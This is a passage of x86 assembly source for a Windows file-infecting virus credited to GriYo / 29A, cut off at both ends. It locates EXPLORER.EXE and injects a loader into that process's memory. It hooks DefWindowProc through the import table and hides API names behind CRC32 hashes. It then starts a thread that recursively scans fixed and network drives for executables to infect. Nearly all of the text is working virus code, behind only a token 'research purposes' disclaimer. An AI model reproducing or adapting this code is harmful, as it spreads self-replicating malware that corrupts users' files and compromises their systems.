lea edi,dword ptr [ebp+BufStrFilename]
call parse_filename

mov esi,edx
call get_str_crc32
cmp edx,dword ptr [ebp+CRCszEXPLORER] ;Is EXPLORER.EXE ?
je EFoundTryMod

;============================================================
;Go to next process
;============================================================

lea eax,dword ptr [ebp+ProcessEntry]
push eax ;lppe
push dword ptr [ebp+hSnapshot] ;hSnapshot
call dword ptr [ebp+a_Process32Next]
or eax,eax
jnz CheckProcEntry

CloseSnapshot: push dword ptr [ebp+hSnapshot]
call dword ptr [ebp+a_CloseHandle]

jmp ExitMemWin9x

;============================================================
;Close snapshot and create a new one, but this time we are
;going to list modules loaded by EXPLORER.EXE
;============================================================

EFoundTryMod: push dword ptr [ebp+hSnapshot]
call dword ptr [ebp+a_CloseHandle]

push dword ptr [ebp+ProcEth32ProcessID] ;th32ProcessID
push TH32CS_SNAPMODULE ;dwFlags

call dword ptr [ebp+a_CreateToolhelp32Snapshot]
cmp eax,0FFFFFFFFh
je ExitMemWin9x

mov dword ptr [ebp+hSnapshot],eax

;============================================================
;Perfect !!!! Lets retrieve 1st module using Module32First
;============================================================

lea edi,dword ptr [ebp+ModuleEntry]
push edi ;lpme
mov dword ptr [edi],SIZEOFMODULEENTRY
push eax ;hSnapshot
call dword ptr [ebp+a_Module32First]
or eax,eax
jz CloseSnapshot

;============================================================
;Check if this is the module we are interested in
;============================================================

CheckEMod: mov eax,dword ptr [ebp+ProcEth32ModuleID]
cmp eax,dword ptr [ebp+ModEth32ModuleID]
je GetModDone

;============================================================
;Go to next module
;============================================================

push edi ;lpme
push dword ptr [ebp+hSnapshot] ;hSnapshot
call dword ptr [ebp+a_Module32Next]
or eax,eax
jnz CheckEMod

jmp CloseSnapshot ;Abort if module not found

;============================================================
;Ohj0j0... Fine! Here we are with EXPLORER.EXE module handle
;============================================================

GetModDone: mov edx,dword ptr [ebp+ModEhModule]
mov dword ptr [ebp+hModule],edx

;============================================================
;Open process
;============================================================

mov eax,dword ptr [ebp+ProcEth32ProcessID]
call OpenProcess
or eax,eax
jz CloseSnapshot

;============================================================
;Duh! EXPLORER.EXE process is now 0wN3d
;============================================================

call FuckExplorer

;============================================================
;Close process
;============================================================

push dword ptr [ebp+hProcess]
call dword ptr [ebp+a_CloseHandle]
jmp CloseSnapshot

;============================================================================
;Residency routines for Windows NT & Windows 2000
;============================================================================

;============================================================
;Hands on USER32 apis for Windows NT (Use wide versions)
;============================================================

MemInfectWinNt: mov eax,dword ptr [ebp+CRCszUSER32]
mov ecx,NumUSER32Apis
lea esi,dword ptr [ebp+CRC32USER32Apiswnt]
lea edi,dword ptr [ebp+epUSER32Apis]
call VirLoadLib
mov dword ptr [ebp+hUSER32],eax
or eax,eax
jz GoBack2Host

;============================================================
;We need PSAPI.DLL to do the trick
;============================================================

mov eax,dword ptr [ebp+CRCszPSAPI]
mov ecx,NumPSAPIApis
lea esi,dword ptr [ebp+CRC32PSAPIApis]
lea edi,dword ptr [ebp+epPSAPIApis]
call VirLoadLib
mov dword ptr [ebp+hPSAPI],eax
or eax,eax
jz FreeUSER32

;============================================================
;Get a list of loaded processes (Max. 32 processes)
;============================================================

DonePSAPI: lea edi,dword ptr [ebp+EP_Bytes]
push edi ;cbNeeded
push 00000080h ;cb
lea esi,dword ptr [ebp+ProcessIdList]
push esi
call dword ptr [ebp+a_EnumProcesses]
or eax,eax
jz ExitMemNt

;============================================================
;To determine how many processes were enumerated by the call
;to EnumProcesses, divide the resulting value in the cbNeeded
;parameter by sizeof(DWORD)
;============================================================

mov ecx,dword ptr [edi]
shr ecx,02h ;Divide ECX by 4... Nice, isnt it?
jecxz ExitMemNt

;============================================================
;Now we have a list of process identifiers... Follow it
;============================================================

ProcessLookUp: push ecx
cld
lodsd
push esi

;============================================================
;Open process
;============================================================

call OpenProcess
or eax,eax
jz TryNextProcess

;============================================================
;Enumerate process modules... The 1st obtained module
;is the executable itself
;============================================================

lea edx,dword ptr [ebp+EP_Bytes] ;lpcbNeeded
push edx
push 00000080h ;cb
lea esi,dword ptr [ebp+ModuleList]
push esi ;lphModule
push eax ;hProcess

call dword ptr [ebp+a_EnumProcessModules]
or eax,eax
jz NCProcess

cld
lodsd ;The first module is the .EXE itself

mov dword ptr [ebp+hModule],eax

;============================================================
;Get module name using GetModuleBaseNameA API
;============================================================

push MAX_PATH ;nSize
lea esi,dword ptr [ebp+BufStrFilename]
push esi ;lpBaseName
push eax ;hModule
push dword ptr [ebp+hProcess] ;hProcess

call dword ptr [ebp+a_GetModuleBaseNameA]
or eax,eax
jz NCProcess

;============================================================
;Module name is EXPLORER.EXE (use CRC32 comparison)
;============================================================

mov edi,esi
call parse_filename
mov esi,edx
call get_str_crc32
cmp edx,dword ptr [ebp+CRCszEXPLORER] ;Is EXPLORER.EXE ?
jne NCProcess

;============================================================
;If EXPLORER.EXE found cleanup and go to the memory
;infection procedure
;============================================================

pop eax
pop eax
call FuckExplorer

;============================================================
;Close process
;============================================================

push dword ptr [ebp+hProcess]
call dword ptr [ebp+a_CloseHandle]

jmp ExitMemNt

;============================================================
;Try next process
;============================================================

NCProcess: push dword ptr [ebp+hProcess]
call dword ptr [ebp+a_CloseHandle]

TryNextProcess: pop esi
pop ecx
loop ProcessLookUp

;============================================================
;Residency proc failed!
;============================================================

ExitMemNt: push dword ptr [ebp+hPSAPI]
call dword ptr [ebp+a_FreeLibrary]
jmp FreeUSER32

;============================================================================
;Open process
;
;On entry:
; eax -> Process id
;On exit:
; eax -> Handle to process or NULL if error
;============================================================================

PROCESS_TERMINATE equ 00000001h
PROCESS_CREATE_THREAD equ 00000002h
PROCESS_SET_SESSIONID equ 00000004h
PROCESS_VM_OPERATION equ 00000008h
PROCESS_VM_READ equ 00000010h
PROCESS_VM_WRITE equ 00000020h
PROCESS_DUP_HANDLE equ 00000040h
PROCESS_CREATE_PROCESS equ 00000080h
PROCESS_SET_QUOTA equ 00000100h
PROCESS_SET_INFORMATION equ 00000200h
PROCESS_QUERY_INFORMATION equ 00000400h

OpenProcess: push eax
push 00000000h
push PROCESS_QUERY_INFORMATION or /
PROCESS_VM_READ or /
PROCESS_VM_WRITE or /
PROCESS_VM_OPERATION

call dword ptr [ebp+a_OpenProcess]

mov dword ptr [ebp+hProcess],eax
ret

;============================================================================
;Infect EXPLORER.EXE in memory
;============================================================================

;============================================================
;Now search for the section header list
;============================================================

FuckExplorer: mov ebx,dword ptr [ebp+hModule]

mov ecx,00000004h
lea esi,dword ptr [ebp+Explorer_MZ_lfanew]
mov eax,ebx
add eax,MZ_lfanew
call ReadProcessMem
or eax,eax
jz FE_Exit

lodsd ;There is a CLD at the end of ReadProcessMem
or eax,eax ;Now esi -> Explorer_FH_SizeOfOptionalHeader
jz FE_Exit

; eax -> MZ_lfanew

add eax,ebx
mov edi,eax
add eax,00000004h + FH_SizeOfOptionalHeader
dec ecx
dec ecx
call ReadProcessMem
or eax,eax
jz FE_Exit

lodsw ;Just to do
;esi -> Explorer_FH_NumberOfSections
mov eax,edi
add eax,00000004h + FH_NumberOfSections
call ReadProcessMem
or eax,eax
jz FE_Exit

lodsw ;esi -> Explorer_SectionHeader
movzx ecx,ax ;ecx -> Number of sections

movzx eax,word ptr [ebp+Explorer_FH_SizeOfOptionalHeader]
add edi,eax
add edi,00000004h + IMAGE_SIZEOF_FILE_HEADER

;============================================================
;Search for a suitable section
;============================================================

ExplorerHole: push ecx

mov eax,edi
mov ecx,IMAGE_SIZEOF_SECTION_HEADER
call ReadProcessMem
or eax,eax
jz E_NextSection

;============================================================
;Is this a valid section?
;============================================================

cmp dword ptr [esi+SH_Characteristics], /
IMAGE_SCN_MEM_READ or /
IMAGE_SCN_MEM_WRITE or /
IMAGE_SCN_CNT_INITIALIZED_DATA
jne E_NextSection

mov eax,dword ptr [esi+SH_SizeOfRawData]
sub eax,dword ptr [esi+SH_VirtualSize]
js E_NextSection

cmp eax,SIZEOF_EVL
jae Ok_E_Section

;============================================================
;Try next section
;============================================================

E_NextSection: add edi,ecx
pop ecx
loop ExplorerHole

;============================================================
;No suitable section found
;============================================================

jmp FE_Exit

;============================================================
;Yes, this is a valid section... Write virus loader
;============================================================

Ok_E_Section: pop ecx ;Cleanup stack

mov eax,dword ptr [ebp+a_DefWindowProc]
mov dword ptr [ebp+EVL_a_OrginalApiAddr],eax

mov eax,dword ptr [ebp+a_OpenFileMappingA]
mov dword ptr [ebp+EVL_a_OpenFileMapping],eax
mov eax,dword ptr [ebp+a_MapViewOfFile]
mov dword ptr [ebp+EVL_a_MapViewOfFile],eax

mov eax,ebx
add eax,dword ptr [esi+SH_VirtualAddress]
add eax,dword ptr [esi+SH_VirtualSize]

mov dword ptr [ebp+Explorer_Patch],eax

mov ecx,SIZEOF_EVL
lea esi,dword ptr [ebp+EVL_code]
call WriteProcessMem
or eax,eax
jz FE_Exit

;============================================================
;Go to EXPLORER.EXE data directory
;============================================================

mov eax,ebx
add eax,dword ptr [ebp+Explorer_MZ_lfanew]
add eax,00000004h + /
IMAGE_SIZEOF_FILE_HEADER + /
OH_DataDirectory.DE_Import.DD_VirtualAddress

mov ecx,00000004h
lea esi,dword ptr [ebp+Explorer_DE_Import]
call ReadProcessMem
or eax,eax
jz FE_Exit

;============================================================
;Search for USER32 import module descriptor
;============================================================

lodsd
add eax,ebx
mov edi,eax

E_Search_K32: mov eax,edi
mov ecx,IMAGE_SIZEOF_IMPORT_DESCRIPTOR
lea esi,dword ptr [ebp+Explorer_ImportDescriptor]
call ReadProcessMem
or eax,eax
jz FE_Exit

;============================================================
;Last import module descriptor!?
;============================================================

cmp dword ptr [esi],00000000h
je FE_Exit

;============================================================
;Check import module descriptor ID_Name
;============================================================

mov eax,ebx
add eax,dword ptr [esi+ID_Name]
mov ecx,00000010h
lea esi,dword ptr [ebp+Explorer_ID_Name]
call ReadProcessMem
or eax,eax
jz FE_Exit

push edi

lea edi,dword ptr [ebp+BufStrFilename]
call parse_filename
mov esi,edx
call get_str_crc32

pop edi

cmp edx,dword ptr [ebp+CRCszUSER32] ;Is USER32.DLL ?
je E_Found_K32

;============================================================
;Next import module descriptor
;============================================================

add edi,IMAGE_SIZEOF_IMPORT_DESCRIPTOR
jmp E_Search_K32

;============================================================
;USER32.DLL import module descriptor found
;============================================================

E_Found_K32: mov edi,dword ptr [ebp+ /
Explorer_ImportDescriptor+ /
ID_FirstThunk]
add edi,ebx
mov ecx,00000004h
lea esi,dword ptr [ebp+Explorer_Hook]

E_NextThunk: mov eax,edi
call ReadProcessMem
or eax,eax
jz FE_Exit

mov eax,dword ptr [esi]
or eax,eax
jz FE_Exit

cmp eax,dword ptr [ebp+a_DefWindowProc]
je E_Poison

add edi,ecx
jmp E_NextThunk

;============================================================
;Gotcha!
;============================================================

E_Poison: mov eax,edi
mov dword ptr [ebp+Explorer_Init_Hook],eax
lea esi,dword ptr [ebp+Explorer_Patch]

call WriteProcessMem ; ECX already loaded
or eax,eax
jz FE_Exit

;============================================================
;Done!!!! ieieie!!!!
;============================================================

FE_Exit: ret

;============================================================================
;Code injected into EXPLORER.EXE
;
;The purpose of this code is to get access to virus memory from EXPLORER.EXE
;============================================================================

EVL_code equ $

;============================================================
;Let some space for the return address... then save all regs
;============================================================

push eax
pushad

;============================================================
;This is the original address of the API... Lets make the
;return address point to it
;============================================================

db 0B8h ; EAX -> Original API address
EVL_a_OrginalApiAddr dd 00000000h

mov dword ptr [esp+cPushad],eax

;============================================================
;Attempt to avoid reentrance problems
;============================================================

call MultiThreadSafe

db 00h ;Only changed over hook code, not over main virus body

MultiThreadSafe:pop esi
mov edi,esi
cld
lodsb
or al,al
jnz MayBeOnNextCall
dec al
stosb

;============================================================
;Try to open the virus file-mapping
;
;There is some kinda race condition here... If the infected
;program terminates before this point we wont be able to
;find the rest of the virus in memory...
;
;In that case the hook will stay present, and this code may
;be able to find the virus memory-mapping on next attemps
;============================================================

call GetszObjName ;lpName

szObjectName db 10h dup (00h)

GetszObjName: push 00000000h ;bInheritHandle
mov edi,FILE_MAP_WRITE
push edi ;dwDesiredAccess

db 0B8h ; EAX -> OpenFileMappingA
EVL_a_OpenFileMapping dd 00000000h

call eax
or eax,eax
jz MayBeOnNextCall

;============================================================
;The file-mapping is here... Get an image of it
;============================================================

xor edx,edx
push edx
push edx
push edx
push edi
push eax

db 0B8h ; EAX -> OpenFileMappingA
EVL_a_MapViewOfFile dd 00000000h

call eax

or eax,eax
jz MayBeOnNextCall

;============================================================
;Great! We have access to virus allocated memory, but
;remember we are now inside EXPLORER.EXE !!!!
;
;Jump to virus complete image in order to complete
;initialization inside EXPLORER.EXE
;============================================================

add eax,offset ExplorerInit - offset viro_sys
call eax

;============================================================
;Restore regs and jump to original API code
;============================================================

MayBeOnNextCall:popad
ret

SIZEOF_EVL equ $-EVL_code

;============================================================================
;Read process memory routine
;
;On entry:
; eax -> Pointer to the base address from which to read
; ecx -> Specifies the requested number of bytes to read
; esi -> Pointer to a buffer that receives the contents from
; the address address
;
; [ebp+hProcess] contains the target process handle
;
;On exit:
; eax -> NULL if error
;
; ebx, ecx, esi, edi, ebp preserved
;============================================================================

ReadProcessMem: push edi
push ecx

lea edi,dword ptr [ebp+EP_Bytes] ;lpNumberOfBytesRead
push edi
push ecx ;nSize
push esi ;lpBuffer
push eax ;lpBaseAddress
push dword ptr [ebp+hProcess] ;hProcess

call dword ptr [ebp+a_ReadProcessMemory]

pop ecx

or eax,eax
jz ExitREM

cmp dword ptr [edi],ecx
je ExitREM

xor eax,eax

ExitREM: pop edi
cld
ret

;============================================================================
;Write process memory routine
;
;On entry:
; eax -> Pointer to the base address in the specified process
; to which data will be written
; ecx -> Specifies the number of bytes to write
; esi -> Pointer to the buffer that contains data to be written
;
; [ebp+hProcess] contains the target process handle
;
;On exit:
; eax -> NULL if error
;
; ebx, ecx, esi, edi, ebp preserved
;============================================================================

WriteProcessMem:push edi
push ecx

lea edi,dword ptr [ebp+EP_Bytes] ;lpNumberOfBytesWritten
push edi
push ecx ;nSize
push esi ;lpBuffer
push eax ;lpBaseAddress
push dword ptr [ebp+hProcess] ;hProcess

call dword ptr [ebp+a_WriteProcessMemory]

pop ecx

or eax,eax
jz ExitWEM

cmp dword ptr [edi],ecx
je ExitWEM

xor eax,eax

ExitWEM: pop edi
cld
ret

;============================================================================
;Make crc lookup table
;
;Generate a table for a byte-wise 32-bit CRC calculation on the polynomial:
;x^32+x^26+x^23+x^22+x^16+x^12+x^11+x^10+x^8+x^7+x^5+x^4+x^2+x+1.
;
;Polynomials over GF(2) are represented in binary, one bit per coefficient,
;with the lowest powers in the most significant bit. Then adding polynomials
;is just exclusive-or, and multiplying a polynomial by x is a right shift by
;one. If we call the above polynomial p, and represent a byte as the
;polynomial q, also with the lowest power in the most significant bit (so the
;byte 0xb1 is the polynomial x^7+x^3+x+1), then the CRC is (q*x^32) mod p,
;where a mod b means the remainder after dividing a by b.
;
;This calculation is done using the shift-register method of multiplying and
;taking the remainder. The register is initialized to zero, and for each
;incoming bit, x^32 is added mod p to the register if the bit is a one (where
;x^32 mod p is p+x^32 = x^26+...+1), and the register is multiplied mod p by
;x (which is shifting right by one and adding x^32 mod p if the bit shifted
;out is a one). We start with the highest power (least significant bit) of
;q and repeat for all eight bits of q.
;
;The table is simply the CRC of all possible eight bit values. This is all
;the information needed to generate CRC's on data a byte at a time for all
;combinations of CRC register values and incoming bytes.
;
;Original C code by Mark Adler
;Translated to asm for Win32 by GriYo
;============================================================================

make_crc_tbl:

;============================================================================
;Make exclusive-or pattern from polynomial (0EDB88320h)
;
;The following commented code is an example of how to
;make the exclusive-or pattern from polynomial
;at runtime
;
; xor edx,edx
; mov ecx,0000000Eh
; lea ebx,dword ptr [ebp+tbl_terms]
;calc_poly: mov eax,ecx
; xlatb
; sub eax,0000001Fh
; neg eax
; bts edx,eax
; loop calc_poly
;
; edx contains now the exclusive-or pattern
;
; The polynomial is:
;
; X^32+X^26+X^23+X^22+X^16+X^12+X^11+X^10+X^8+X^7+X^5+X^4+X^2+X^1+X^0
;
;tbl_terms db 0,1,2,4,5,7,8,10,11,12,16,22,23,26
;
;============================================================================

cld
mov ecx,00000100h
lea edi,dword ptr [ebp+tbl_crc32]
crc_tbl_do: mov eax,000000FFh
sub eax,ecx
push ecx
mov ecx,00000008h
make_crc_value: shr eax,01h
jnc next_value
xor eax,0EDB88320h
next_value: loop make_crc_value
pop ecx
stosd
loop crc_tbl_do
ret

;============================================================================
;Return a 32bit CRC of the contents of the buffer
;
;On entry:
; esi -> Ptr to buffer
; ecx -> Buffer size
;On exit:
; edx -> 32bit CRC
;============================================================================

get_crc32: cld
push edi
xor edx,edx
lea edi,dword ptr [ebp+tbl_crc32]
crc_calc: push ecx
lodsb
xor eax,edx
and eax,000000FFh
shr edx,08h
xor edx,dword ptr [edi+eax]
pop ecx
loop crc_calc
pop edi
ret

;============================================================================
;Get a 32bit CRC of a null terminated array
;
;On entry:
; esi -> Ptr to string
;Exit:
; edx -> 32bit CRC
;============================================================================

get_str_crc32: cld
push ecx
push edi
mov edi,esi
xor eax,eax
mov ecx,eax
crc_sz: inc ecx
scasb
jnz crc_sz
call get_crc32
pop edi
pop ecx
ret

;============================================================================
;Get the entry-point of GetProcAddress
;
;On entry:
; ebx -> KERNELL32 base address
;On exit:
; ecx -> Address of GetProcAddress
;============================================================================

GetGetProcAddr: cld
mov eax,dword ptr [ebx+IMAGE_DOS_HEADER.MZ_lfanew]
mov edx,dword ptr [eax+ /
ebx+ /
NT_OptionalHeader. /
OH_DirectoryEntries. /
DE_Export. /
DD_VirtualAddress]
add edx,ebx
mov esi,dword ptr [edx+ED_AddressOfNames]
add esi,ebx
mov edi,dword ptr [edx+ED_AddressOfNameOrdinals]
add edi,ebx
mov ecx,dword ptr [edx+ED_NumberOfNames]

function_loop: lodsd
push edx
push esi
lea esi,dword ptr [eax+ebx] ;Get ptr to API name
call get_str_crc32 ;Get CRC32 of API name
pop esi
cmp edx,dword ptr [ebp+CrcGetProcAddr]
je API_found
inc edi
inc edi
pop edx
loop function_loop
ret

API_found: pop edx
movzx eax,word ptr [edi]
sub eax,dword ptr [edx+ED_BaseOrdinal]
inc eax
shl eax,02h
mov esi,dword ptr [edx+ED_AddressOfFunctions]
add esi,eax
add esi,ebx
lodsd
lea ecx,dword ptr [eax+ebx]
ret

;============================================================================
;Get the entry-point of each needed API
;
;This routine uses the CRC32 instead of API names
;
;On entry:
; ebx -> Base address of DLL
; ecx -> Number of APIs in the folling buffer
; esi -> Buffer filled with the CRC32 of each API name
; edi -> Recives found API addresses
;On exit:
; ecx -> Is 00000000h if everything was ok
;============================================================================

get_APIs: cld
get_each_API: push ecx
push esi

;============================================================
;Get a pointer to the EXPORT data
;============================================================

mov eax,dword ptr [ebx+IMAGE_DOS_HEADER.MZ_lfanew]
mov edx,dword ptr [eax+ /
ebx+ /
NT_OptionalHeader. /
OH_DirectoryEntries. /
DE_Export. /
DD_VirtualAddress]
add edx,ebx
mov esi,dword ptr [edx+ED_AddressOfNames]
add esi,ebx
mov ecx,dword ptr [edx+ED_NumberOfNames]

;============================================================
;Try to find an API name that matches given CRC32
;============================================================

API_Loop: lodsd
push esi ;Ptr to AddressOfNames
lea esi,dword ptr [eax+ebx]
push esi ;Save ptr to API name
call get_str_crc32
mov esi,dword ptr [esp+00000008h]
lodsd
cmp eax,edx
je CRC_API_found
pop eax ;Remove API name from stack
pop esi ;Ptr to RVA for next API name
loop API_Loop
get_API_error: pop esi ;Ptr to CRC's of API names
pop ecx ;Number of API's
ret ;Exit with error (ecx!=NULL)

;============================================================
;The ptr to API name is already on stack, now push the
;module handle and call GetProcAddress
;============================================================

CRC_API_found: push ebx
call dword ptr [ebp+a_GetProcAddress]

cld ;Dont let the API call change this
pop edx ;Remove ptr to RVA for next name

or eax,eax
jz get_API_error;If GetProcAddress returned NULL exit

stosd ;Save the API address into given table
pop esi ;Ptr to CRC's of API names
lodsd
pop ecx
loop get_each_API
ret

;============================================================================
;Find base address of KERNEL32.DLL
;Thanks to Jacky Qwerty for the SEH routines
;============================================================================

SEH_Block_0000 macro
add esp,-cPushad
jnz GNtBA_L1
endm

IGetNtBaseAddr: @SEH_SetupFrame <SEH_Block_0000>
mov ecx,edx
xchg ax,cx
GNtBA_L0: dec cx
jz GNtBA_L2
add eax,-10000h
pushad
mov bx,-IMAGE_DOS_SIGNATURE
add bx,word ptr [eax]
mov esi,eax
jnz GNtBA_L1
mov ebx,-IMAGE_NT_SIGNATURE
add eax,dword ptr [esi.MZ_lfanew]
mov edx,esi
add ebx,dword ptr [eax]
jnz GNtBA_L1
add edx,[eax.NT_OptionalHeader.OH_DirectoryEntries. /
DE_Export.DD_VirtualAddress]
add esi,dword ptr [edx.ED_Name]
lea edi,dword ptr [ebp+BufStrFilename]
call parse_filename
mov esi,edx
call get_str_crc32
cmp edx,dword ptr [ebp+CrcKernel32] ;Is KERNEL32.DLL ?
je k32_f
GNtBA_L1: popad
jmp GNtBA_L0

k32_f: popad
xchg ecx,eax
inc eax

GNtBA_L2: @SEH_RemoveFrame
ret

;============================================================================
;VirLoadLib
;
;To use CRC32 instead of API names sounds cool... But there are still some
;strings authors cant get rid of... When calling LoadLibrary the virus must
;specify the DLL name
;
;This routine is the solution to avoid the usage of DLL names
;
;On entry:
; eax -> CRC32 of DLL name
; esi -> CRC32 of API names
; edi -> Where to put API addresses
; ecx -> Number of APIs to find
;On exit:
; eax -> Module handle or NULL on error
;============================================================================

VirLoadLib: push ecx
push esi
push edi

mov dword ptr [ebp+a_SDLL_CRC32],eax

lea eax,dword ptr [ebp+DirectFindData]
push eax ;lpFindFileData
lea eax,dword ptr [ebp+szSYSTEMDIR] ;lpFileName
push eax

call dword ptr [ebp+a_FindFirstFileA]
cmp eax,INVALID_HANDLE_VALUE
jz EVirLoadLib

mov dword ptr [ebp+h_Find],eax

CheckDllName: lea esi,dword ptr [ebp+DirectFindData+WFD_szFileName]
lea edi,dword ptr [ebp+BufStrFilename]
call parse_filename
mov esi,edx
call get_str_crc32

cmp edx,dword ptr [ebp+a_SDLL_CRC32]
je OkCheckDll

lea eax,dword ptr [ebp+DirectFindData]
push eax ;lpFindFileData
push dword ptr [ebp+h_Find] ;hFindFile
call dword ptr [ebp+a_FindNextFileA]
or eax,eax
jnz CheckDllName

EVirLoadLib: pop edi
pop esi
pop ecx
xor eax,eax
ret

OkCheckDll: lea esi,dword ptr [ebp+szSYSTEMDIR]
lea edi,dword ptr [ebp+BufStrFilename]

push edi

call parse_filename
lea esi,dword ptr [ebp+DirectFindData+WFD_szFileName]
mov edi,edx
call parse_filename

call dword ptr [ebp+a_LoadLibraryA]
or eax,eax
jz EVirLoadLib

mov ebx,eax

pop edi
pop esi
pop ecx

call get_APIs
jecxz OkVirLoadLib

push ebx
call dword ptr [ebp+a_FreeLibrary]
xor eax,eax
ret

OkVirLoadLib: mov eax,ebx
ret

;============================================================================
;This routine takes a string pointed by esi and copies
;it into a buffer pointed by edi
;
;The result string will be converted to upper-case
;
;On entry:
; esi -> Pointer to source string
; edi -> Pointer to returned string
;
;On exit:
; al -> Null
; edx -> Points to character next to last /
; edi -> Points 1byte above the null terminator
;============================================================================

parse_filename: mov edx,edi
cld
ScanZstring: lodsb
cmp al,"a"
jb no_upper
cmp al,"z"
ja no_upper
and al,0DFh
no_upper: stosb
cmp al,"/"
jne err_slash_pos
mov edx,edi
err_slash_pos: or al,al
jnz ScanZstring
ret

;============================================================================
;Copyright notice and disclaimer
;============================================================================

copyright db '[ Dengue Hemorrhagic Fever'

db ' BioCoded by GriYo / 29A ]'

disclaimer db ' Disclaimer: This software has been designed'
db ' for research purposes only. The author is'
db ' not responsible for any problems caused due to'
db ' improper or illegal usage of it '

;============================================================================
;Virus initialization ( inside EXPLORER.EXE )
;============================================================================

ExplorerInit: call ExplorerDelta
ExplorerDelta: pop ebp
sub ebp,offset ExplorerDelta

;============================================================
;Get current local time
;============================================================

FreeExplorerOk: lea esi,dword ptr [ebp+local_time]
push esi
call dword ptr [ebp+a_GetLocalTime]

;============================================================
;Initialize random number generator seed using current
;year and current month
;============================================================

cld
lodsw
rol eax,10h
lodsw
mov dword ptr [ebp+rnd32_seed],eax

;============================================================
;Locate KERNEL32 code section in memory... This information
;will be used later in the EPO routines
;============================================================

mov ebx,dword ptr [ebp+hKERNEL32]
call get_code_sh
mov eax,dword ptr [edi+SH_VirtualAddress]
add eax,ebx
mov dword ptr [ebp+K32CodeStart],eax
add eax,dword ptr [edi+SH_VirtualSize]
mov dword ptr [ebp+K32CodeEnd],eax

;============================================================
;Sleep for a moment, before start making noise
;============================================================

push 00005000h
call dword ptr [ebp+a_Sleep]

;============================================================
;Load IMAGEHLP.DLL
;
;The ImageHlp functions are supported by the Microsoft
;Windows NT, Windows 95, and Windows 98 operating systems...
;They are used mostly by programming tools, application setup
;utilities, and other programs that need access to the data
;contained in a PE image
;============================================================

mov eax,dword ptr [ebp+CRCszIMGHLP]
mov ecx,NumIMGHLPApis
lea esi,dword ptr [ebp+CRC32IMGHLPApis]
lea edi,dword ptr [ebp+epIMGHLPApis]
call VirLoadLib
mov dword ptr [ebp+hIMGHLP],eax

;============================================================
;Load SFC.DLL (Windows 2000 only)
;============================================================

mov dword ptr [ebp+hSFC],00000000h
cmp dword ptr [ebp+dwMajorVersion],00000005h
jb Ready2Infect

mov eax,dword ptr [ebp+CRCszSFC]
mov ecx,NumSFCApis
lea esi,dword ptr [ebp+CRC32SFCApis]
lea edi,dword ptr [ebp+epSFCApis]
call VirLoadLib
mov dword ptr [ebp+hSFC],eax

;============================================================
;Initialization inside EXPLORER.EXE complete...
;
;Now create a thread to search for files to infect and
;get control back to EXPLORER.EXE
;============================================================

Ready2Infect: lea eax,dword ptr [ebp+IF_ThreadID]
push eax ;lpThreadId
xor edx,edx
push edx ;dwCreationFlags
push edx ;lpParameter
lea eax,dword ptr [ebp+InfectionThread]
push eax ;lpStartAddress
push edx ;dwStackSize
push edx ;lpThreadAttributes
call dword ptr [ebp+a_CreateThread]
or eax,eax
jz AfterThread

ret ; Let the thread running until terminates

;============================================================
;Free SFC
;============================================================

AfterThread: mov eax,dword ptr [ebp+hSFC]
or eax,eax
jz SfcNotLoaded

push eax
call dword ptr [ebp+a_FreeLibrary]

;============================================================
;Free IMAGEHLP
;============================================================

SfcNotLoaded: mov eax,dword ptr [ebp+hIMGHLP]
or eax,eax
jz ExitIThread

push eax
call dword ptr [ebp+a_FreeLibrary]

ret

;============================================================================
;Virus infection thread, created from inside EXPLORER.EXE process
;============================================================================

InfectionThread:call ThreadDelta
ThreadDelta: pop ebp
sub ebp,offset ThreadDelta

lea esi,dword ptr [ebp+szLogicalDrives]
mov edi,SIZEOF_LDSB
push esi
push edi
call dword ptr [ebp+a_GetLogicalDriveStringsA]
or eax,eax
jz ExitIThread

cmp eax,edi
ja ExitIThread

;============================================================
;Follow the drives chain
;============================================================

DrivesLoop: cmp byte ptr [esi],00h
jnz MoreDrives

;============================================================
;Terminate infection thread
;============================================================

ExitIThread: call AfterThread

push 00000000h
call dword ptr [ebp+a_ExitThread] ;Leave the thread

;============================================================
;Check drive type, only fixed or remote drives allowed
;============================================================

MoreDrives: push esi
call dword ptr [ebp+a_GetDriveTypeA]

cmp eax,00000003h ; DRIVE_FIXED
je CheckThisDrive

cmp eax,00000004 ; DRIVE_REMOTE
jne NextDrive

;============================================================
;Got it! Do recursive search on drive
;============================================================

CheckThisDrive: push esi
lea edi,dword ptr [ebp+BufGetDir]
push edi
call parse_filename
call Search4Files
pop edi
pop esi

NextDrive: cld
NextDString: lodsb
or al,al
jnz NextDString

jmp DrivesLoop

;============================================================================
;Search for target...
;
;This routine its able to call itself in order to perform a recursive
;search all along the entire directory tree
;
;============================================================================

;============================================================
;Store local information on the stack
;============================================================

Search4Files: sub esp,SIZEOF_WIN32_FIND_DATA + 00000004h
mov ebx,esp

;Find frame:
;
; Path where to perform search ( size MAX_PATH )
; Return address ( size DWORD )
; FindHandle ( size DWORD )
; Find data ( size SIZEOF_WIN32_FIND_DATA )

FindStack_Ptr2FindData equ 00000000h
FindStack_Ptr2FindHandle equ SIZEOF_WIN32_FIND_DATA
FindStack_Ptr2ReturnAddress equ SIZEOF_WIN32_FIND_DATA + 00000004h
FindStack_Ptr2SearchPath equ SIZEOF_WIN32_FIND_DATA + 00000008h

;============================================================
;Do FindFirstFile
;============================================================

push ebx ; lpFindFileData

mov esi,dword ptr [ebx+FindStack_Ptr2SearchPath]
mov edi,esi

push edi ; lpFileName

call parse_filename
dec edi

cmp byte ptr [edi-00000001h],'/'
jne RootAware

dec edi

RootAware: mov eax,'*.*/'
stosd
xor eax,eax
stosb

call dword ptr [ebp+a_FindFirstFileA]
cmp eax,INVALID_HANDLE_VALUE
je ErrorFindFirst

mov dword ptr [ebx+FindStack_Ptr2FindHandle],eax

;============================================================
;Find data ready to be checked
;============================================================

GoFindRecord: lea esi,dword ptr [ebx+WFD_szFileName]
cld
lodsd

;============================================================
;Check for . and ..
;============================================================

cmp ax,002Eh
je DoFindNext

and eax,00FFFFFFh
cmp eax,00002E2Eh
je DoFindNext

;============================================================
;Check if this is a directory
;============================================================

mov eax,dword ptr [ebx]

test eax,FILE_ATTRIBUTE_DIRECTORY
jz DoFileFound

;============================================================
;Directory found, perform recursive search on it
;============================================================

push ebx

mov esi,dword ptr [ebx+FindStack_Ptr2SearchPath]
sub esp,MAX_PATH
mov edi,esp

push edi

call parse_filename

lea esi,dword ptr [ebx+WFD_szFileName]
mov edi,edx
call parse_filename

call Search4Files
pop edi

add esp,MAX_PATH

pop ebx
jmp DoFindNext

;============================================================
;File found, check if its a valid host
;============================================================

DoFileFound: and eax,FILE_ATTRIBUTE_DIRECTORY or /
